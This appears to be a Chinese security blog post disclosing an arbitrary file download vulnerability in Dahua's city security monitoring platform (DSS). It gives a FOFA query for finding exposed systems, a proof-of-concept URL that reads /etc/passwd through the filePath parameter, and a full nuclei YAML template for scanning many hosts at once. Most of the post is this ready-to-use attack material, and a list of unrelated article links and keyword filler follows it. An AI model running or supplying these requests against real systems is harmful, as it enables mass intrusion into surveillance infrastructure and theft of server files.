大华城市安防监控系统平台管理 attachment_downloadByUrlAtt.action 任意文件下载漏洞

漏洞简介

大华城市安防监控系统平台管理存在任意文件下载漏洞，攻击者通过漏洞可以下载服务器上的任意文件

漏洞复现

fofa语法：app="dahua-DSS"
登录页面如下：

POC：/portal/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd

nuclei批量yaml文件

id: dahua_DSS_attachment_downloadByUrlAtt_fileread
info:
  name: 大华 城市安防监控系统平台管理 attachment_downloadByUrlAtt.action 任意文件下载漏洞
  author: mhb17
  severity: high
  description: description
  reference:
    - https://
  tags: fileread
requests:
  - raw:
      - |+
        GET /portal/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd HTTP/1.1
        Host: {{Hostname}}
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
        Connection: close

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - '200'
      - type: regex
        regex:
          - "root:.*:0:0:"

本栏目推荐文章
• C++实现文件内查找字符串
• IDEA项目名称后面出现中括号，模块Modules的名子和文件夹名称不同，可以右键修改名称也可以在File->Project Structure 修改Modules的Name(快捷键ctrl+Shift+Alt+s)
• VMware虚拟机安装银河麒麟桌面版V10系统
• 和利时MACS6通过dat文件实现任意时间范围与测点的历史数据提取与科研分析
• OpenHarmony 上跑CV 应用 - Windows上搭建 Linux 桌面系统
• 多项式定积分计算软件2025 64位WIN版下载Polynomial definite integral calculation software 2025 64 bit WIN version download
• JFinal学生信息管理系统
• 类模板分文件编写
• Linux文件IO之二 [补档-2023-07-21]
• 从Bitcask存储模型谈超轻量级KV系统设计与实现

attachment_downloadByUrlAtt downloadByUrlAtt 文件下载 监控系统 attachmentattachment_downloadbyurlatt attachment_downloadbyurlatt downloadbyurlatt downloadbyurlatt attach attached attaching no-strings-attached attachment element reference attached document attached android devices offline